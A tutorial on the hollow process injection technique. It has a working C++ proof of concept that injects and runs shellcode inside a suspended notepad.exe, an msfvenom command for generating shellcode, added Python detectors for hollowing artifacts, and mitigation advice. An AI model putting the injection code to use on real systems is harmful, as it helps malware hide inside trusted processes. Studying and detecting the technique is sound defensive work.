
Demystifying Hollow Process Injection

Hollow Process Injection: Swapping out the engine of a car while it's running – except the car is a computer, and you're the mechanic!

In the realm of cybersecurity and software development, understanding the various code injection techniques is paramount. One technique that has gained attention in recent years is Hollow Process Injection.


What is Hollow Process Injection?


In conventional process injection, a new thread or DLL (Dynamic Link Library) containing malicious code is injected into the address space of an existing process, and the injected code executes alongside the original program's code.


[Figure: Hollow Process Injection]

Unlike process injection, hollow process injection suspends a legitimate process, overwrites its existing code section with malicious code, and then resumes the process. Essentially, the attacker creates a "hollowed-out" shell of the original process and injects their code within it.


How Does Hollow Process Injection Work?


Imagine a legitimate program running on your system, such as a basic notepad application. Hollow process injection abuses the way the operating system lets a program be created and manipulated before it starts running, rather than any bug in the program itself.


  • Target Selection: The attacker first identifies a target process running on the system. This process is usually a trusted and commonly used application to evade detection.

  • Creating a Suspended Process: The attacker creates a new instance of the target process in a suspended state. This allows them to manipulate the process before it starts executing.

  • Allocating Memory: Next, the attacker allocates memory within the suspended process to hold their malicious payload.

  • Injecting Malicious Code: The attacker injects their malicious code into the allocated memory space of the target process. This code can perform various malicious activities, such as stealing sensitive data, executing additional payloads, or establishing backdoor access.

  • Replacing Legitimate Code: Rather than running the payload beside the original code, hollow process injection replaces the legitimate code of the target process with the malicious code while keeping the process's execution flow intact.

  • Resuming Execution: Finally, the attacker resumes execution of the modified process, which now runs the malicious code seamlessly alongside its legitimate functionality.

From the outside, the program appears to function normally. However, under the hood, the malicious code is now running with the same privileges as the legitimate process, potentially allowing the attacker to steal data, install malware, or disrupt system operations.
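The steps above leave artifacts that a memory-forensics tool or an EDR sensor can look for: the PEB still names the legitimate executable, but the memory at its image base is no longer a file-backed image, and threads start in private executable memory that belongs to no loaded module. The following is an added example, not code from the original post, that checks a process snapshot for those artifacts. The `Region`, `Thread` and `ProcessSnapshot` records and the three sample snapshots are constructed by hand and the field names are assumptions; only the `MEM_*` and `PAGE_*` constants are the real Windows values. It covers both the classic "replace the main image" form and the private-buffer-plus-remote-thread form shown in this page's PoC.

```python
"""Added example: spotting hollowing/injection artifacts in a process memory snapshot.

Nothing here talks to a live process; the records are constructed to resemble
what a memory scanner would enumerate. Field names are assumptions, not an API.
"""
from dataclasses import dataclass
from typing import List, Optional

# Real Windows memory constants from <winnt.h>
MEM_IMAGE = 0x1000000
MEM_PRIVATE = 0x20000
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE* family


@dataclass
class Region:
    base: int
    size: int
    protect: int
    mem_type: int
    mapped_path: Optional[str]  # backing file for MEM_IMAGE regions, else None


@dataclass
class Thread:
    tid: int
    start_address: int


@dataclass
class ProcessSnapshot:
    pid: int
    peb_image_path: str   # PEB -> ProcessParameters -> ImagePathName
    peb_image_base: int   # PEB -> ImageBaseAddress
    regions: List[Region]
    threads: List[Thread]


def region_for(snapshot: ProcessSnapshot, address: int) -> Optional[Region]:
    """Find the region that contains an address, or None if it is unmapped."""
    for r in snapshot.regions:
        if r.base <= address < r.base + r.size:
            return r
    return None


def find_hollowing_indicators(snapshot: ProcessSnapshot) -> List[str]:
    """Return human-readable indicators; an empty list means nothing suspicious."""
    findings = []

    # 1. Classic hollowing: the PEB points at the legitimate EXE, but the memory
    #    at that base is private (unmapped and re-allocated) or backed by a
    #    different file than the PEB claims.
    base_region = region_for(snapshot, snapshot.peb_image_base)
    if base_region is None:
        findings.append("image base from PEB is not mapped at all")
    elif base_region.mem_type != MEM_IMAGE:
        findings.append(f"image base 0x{snapshot.peb_image_base:x} is MEM_PRIVATE, not a mapped image")
    elif base_region.mapped_path and base_region.mapped_path.lower() != snapshot.peb_image_path.lower():
        findings.append(f"PEB path {snapshot.peb_image_path} != mapped file {base_region.mapped_path}")

    # 2. The PoC variant on this page: a thread starting in private executable
    #    memory instead of inside a loaded module.
    for t in snapshot.threads:
        r = region_for(snapshot, t.start_address)
        if r is None:
            findings.append(f"thread {t.tid} starts at unmapped address 0x{t.start_address:x}")
        elif r.mem_type == MEM_PRIVATE and r.protect in EXECUTABLE_PROTECTIONS:
            findings.append(f"thread {t.tid} starts in private executable memory at 0x{t.start_address:x}")

    # 3. Private RWX pages are a strong signal on their own (VirtualAllocEx with
    #    PAGE_EXECUTE_READWRITE, as in the PoC).
    for r in snapshot.regions:
        if r.mem_type == MEM_PRIVATE and r.protect == PAGE_EXECUTE_READWRITE:
            findings.append(f"private RWX region at 0x{r.base:x} ({r.size} bytes)")

    return findings


# --- constructed sample snapshots -------------------------------------------
NOTEPAD = "C:\\Windows\\System32\\notepad.exe"


def clean_notepad() -> ProcessSnapshot:
    """A normal notepad.exe: image mapped from disk, one thread inside it, a heap."""
    return ProcessSnapshot(
        pid=1234, peb_image_path=NOTEPAD, peb_image_base=0x7FF6_0000_0000,
        regions=[
            Region(0x7FF6_0000_0000, 0x40000, PAGE_EXECUTE_READ, MEM_IMAGE, NOTEPAD),
            Region(0x1A0000, 0x10000, PAGE_READWRITE, MEM_PRIVATE, None),
        ],
        threads=[Thread(100, 0x7FF6_0000_1000)],
    )


def notepad_after_poc() -> ProcessSnapshot:
    """What this page's PoC leaves behind: an RWX private buffer and a thread in it."""
    s = clean_notepad()
    s.regions.append(Region(0x2B0000, 0x1000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, None))
    s.threads.append(Thread(200, 0x2B0000))
    return s


def hollowed_notepad() -> ProcessSnapshot:
    """Classic hollowing: the original image was unmapped and private memory put at its base."""
    s = clean_notepad()
    s.regions[0] = Region(0x7FF6_0000_0000, 0x40000, PAGE_EXECUTE_READWRITE, MEM_PRIVATE, None)
    return s


if __name__ == "__main__":
    for name, snap in [("clean", clean_notepad()), ("poc", notepad_after_poc()), ("hollowed", hollowed_notepad())]:
        print(name, find_hollowing_indicators(snap) or "no indicators")
```

On a live system the same checks are run with `VirtualQueryEx` and `GetMappedFileName` over every region; the three rules here mirror what tools in the Volatility `hollowfind` family look for. Expect legitimate JIT engines (browsers, .NET) to produce private executable regions, so rule 3 is best treated as a scoring input rather than an alert on its own.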


Hollow Process Injection PoC


Below is a program demonstrating hollow process injection using C++. It creates a suspended instance of Notepad.exe, allocates memory inside the process, injects a simple shellcode, creates a remote thread within notepad.exe and resumes the process's execution.


#include <iostream>
#include <Windows.h>

int main()
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = {};

    // Target selection: start notepad.exe suspended so its memory can be
    // modified before its first instruction runs.
    if (!CreateProcess(TEXT("C:\\Windows\\System32\\notepad.exe"), NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
    {
        std::cout << "CreateProcess failed: " << GetLastError() << std::endl;
        return 1;
    }

    // replace this with your actual shellcode (two NOPs are only a placeholder)
    BYTE shellcode[] = { 0x90,0x90 };

    // Allocating memory: a read/write/execute buffer inside the suspended process.
    LPVOID pRemoteBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // Injecting malicious code: copy the shellcode into that buffer.
    WriteProcessMemory(pi.hProcess, pRemoteBuffer, shellcode, sizeof(shellcode), NULL);

    // Create thread: run the buffer on a new thread inside notepad.exe.
    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, 0, NULL);

    // Wait for the injected thread to finish before the main thread is released.
    WaitForSingleObject(hThread, INFINITE);

    // Resuming execution: let the original, still-suspended main thread continue.
    ResumeThread(pi.hThread);

    CloseHandle(hThread);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    std::cout << "Shellcode execution completed successfully." << std::endl;

    return 0;
}

In the above PoC, we can see the internal workflow of a hollow process injection.


  • Target Selection: The attacker creates a target process notepad.exe in the suspended state using the CreateProcess() function.

CreateProcess(TEXT("C:\\Windows\\System32\\notepad.exe"), NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

  • Allocating Memory: Next, the attacker allocates memory within the suspended notepad.exe process using the VirtualAllocEx() function to hold the shellcode.

VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  • Injecting Malicious Code: The attacker injects the malicious shellcode into the allocated memory space of the target notepad.exe process using the WriteProcessMemory() function.

WriteProcessMemory(pi.hProcess, pRemoteBuffer, shellcode, sizeof(shellcode), NULL);

  • Create Thread: Attackers create a thread in the target notepad.exe process using the CreateRemoteThread() function to execute the shellcode.

CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, 0, NULL);

  • Resuming Execution: Finally, the attacker resumes the execution of the modified notepad.exe process using the ResumeThread() function, which now runs the malicious shellcode.

ResumeThread(pi.hThread);

Compile the PoC


Install Visual Studio on Windows to compile the above C++ program and generate the executable.


[Figure: compiling the C++ code in Visual Studio]

Note: Replace the shellcode in the above program with your shellcode. You can generate calc.exe shellcode using msfvenom on Kali Linux.


msfvenom -p windows/x64/exec -a x64 cmd=calc.exe -f c -b "\x00"

[Figure: msfvenom calc.exe shellcode]

Execute the PoC


Once the compiled program is created, navigate to the Debug folder within the VS project folder, double-click the executable, and you should see the Calculator program running.


[Figure: hollow process injection]

How to Mitigate Hollow Process Injection?


To detect hollow process injection and prevent it from bypassing traditional AV software, follow the security measures below.


  • Apply Security Patches: Patching vulnerabilities in your software can significantly reduce the risk of exploitation.

  • Implement EDR: In addition to antivirus and anti-malware software, deploy EDR solutions that monitor system processes continuously.

  • Least Privilege: Ensure the principle of least privilege is followed to minimize the risk of system compromise through hollow process injection.

  • Practice User Awareness: Be cautious when opening unknown attachments or clicking suspicious links.
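The EDR point above is where the PoC on this page is actually caught: its sequence (parent starts a child, opens it with write rights, then starts a thread at an address that belongs to no loaded module) shows up in process telemetry. The following is an added example, not code from the original post, of a small detection rule over such telemetry. The sample records are constructed to resemble Sysmon Event 1 (process create), Event 10 (process access) and Event 8 (CreateRemoteThread), and reuse Sysmon's field names; every value in them is made up, and the "two or more reasons" threshold is a design choice of this example.

```python
"""Added example: correlating process-telemetry events to flag the remote-thread
injection sequence used by the hollow process injection PoC.

Field names follow Sysmon Event 1/8/10; the records themselves are constructed.
"""

# Real process access-right bits from <winnt.h>
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
WRITE_AND_ALLOC = PROCESS_VM_OPERATION | PROCESS_VM_WRITE  # what VirtualAllocEx + WriteProcessMemory need

# Constructed sample telemetry: PID 4000 (poc.exe) spawns notepad.exe as PID 4100,
# opens it with full access, then creates a remote thread at an address Sysmon
# could not attribute to any module (StartModule empty). A benign remote thread
# from another process into a real ntdll export is included as a negative case.
SAMPLE_EVENTS = [
    {"EventId": 1, "ProcessId": 4100, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessId": 4000, "ParentImage": r"C:\Users\lab\poc.exe"},
    {"EventId": 10, "SourceProcessId": 4000, "TargetProcessId": 4100,
     "GrantedAccess": "0x1FFFFF"},
    {"EventId": 8, "SourceProcessId": 4000, "TargetProcessId": 4100,
     "StartAddress": "0x00000000002B0000", "StartModule": "", "StartFunction": ""},
    {"EventId": 8, "SourceProcessId": 5000, "TargetProcessId": 5100,
     "StartAddress": "0x00007FFB12345678",
     "StartModule": r"C:\Windows\System32\ntdll.dll", "StartFunction": "RtlUserThreadStart"},
]


def detect_injection(events, min_reasons=2):
    """Return one alert dict per remote thread that matches at least min_reasons indicators."""
    parent_of = {}        # child pid -> (parent pid, child image)
    write_access = set()  # (source pid, target pid) pairs opened with VM_WRITE|VM_OPERATION

    # Pass 1: build context from process-create and process-access events.
    for e in events:
        if e["EventId"] == 1:
            parent_of[e["ProcessId"]] = (e["ParentProcessId"], e["Image"])
        elif e["EventId"] == 10:
            granted = int(e["GrantedAccess"], 16)
            if granted & WRITE_AND_ALLOC == WRITE_AND_ALLOC:
                write_access.add((e["SourceProcessId"], e["TargetProcessId"]))

    # Pass 2: score every cross-process thread creation against that context.
    alerts = []
    for e in events:
        if e["EventId"] != 8 or e["SourceProcessId"] == e["TargetProcessId"]:
            continue
        src, dst = e["SourceProcessId"], e["TargetProcessId"]
        reasons = []
        if not e.get("StartModule"):
            reasons.append("thread start address is not backed by any loaded module")
        if (src, dst) in write_access:
            reasons.append("source previously opened target with VM_WRITE|VM_OPERATION")
        parent, image = parent_of.get(dst, (None, None))
        if parent == src:
            reasons.append("source is the parent that created the target process")
        if len(reasons) >= min_reasons:
            alerts.append({"source": src, "target": dst, "target_image": image,
                           "start_address": e["StartAddress"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_injection(SAMPLE_EVENTS):
        print(f"ALERT pid {alert['source']} -> pid {alert['target']} ({alert['target_image']})")
        for reason in alert["reasons"]:
            print("  -", reason)
```

The rule deliberately needs more than one indicator: a parent creating a thread in its own child, or a thread with no module attribution, each occur in legitimate software (debuggers, JIT runtimes), but the combination with a prior write-capable process open is rare outside injection. In a real pipeline the same logic would run over a time window keyed on the (source, target) pair rather than over the whole event list.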


Conclusion


Hollow process injection is a sophisticated code injection technique attackers use to evade detection and carry out malicious activities. By understanding how it works, organizations can be more vigilant and take steps to protect their systems.

